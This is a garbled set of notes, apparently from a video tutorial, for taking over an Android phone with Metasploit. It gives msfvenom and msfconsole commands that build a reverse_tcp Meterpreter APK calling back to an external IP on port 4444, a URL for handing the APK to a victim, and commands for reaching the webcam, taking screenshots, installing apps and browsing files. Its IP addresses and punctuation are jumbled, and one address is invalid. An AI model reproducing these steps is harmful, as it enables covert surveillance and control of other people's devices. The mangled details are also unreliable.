Aug 11, 2024
ifconfig
to find internal IP address (e.g., 192.168.1.23
)192.168.1.254
)202.202.166.63.69
)4444
8001
service apache2 start
msfvenom -p android/meterpreter/reverse_tcp LHOST=<External IP> LPORT=4444 -o <path>/android_device.apk
msfconsole -q
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
show options
4444
)exploit
http://<External IP>:8001/android_device.apk
sysinfo
- Device informationapp_run
, app_install
- Manage applicationswebcam_list
, webcam_chat
, screenshot
- Access camerapwd
, ls
, cd
- Navigate filesystemThank you for watching!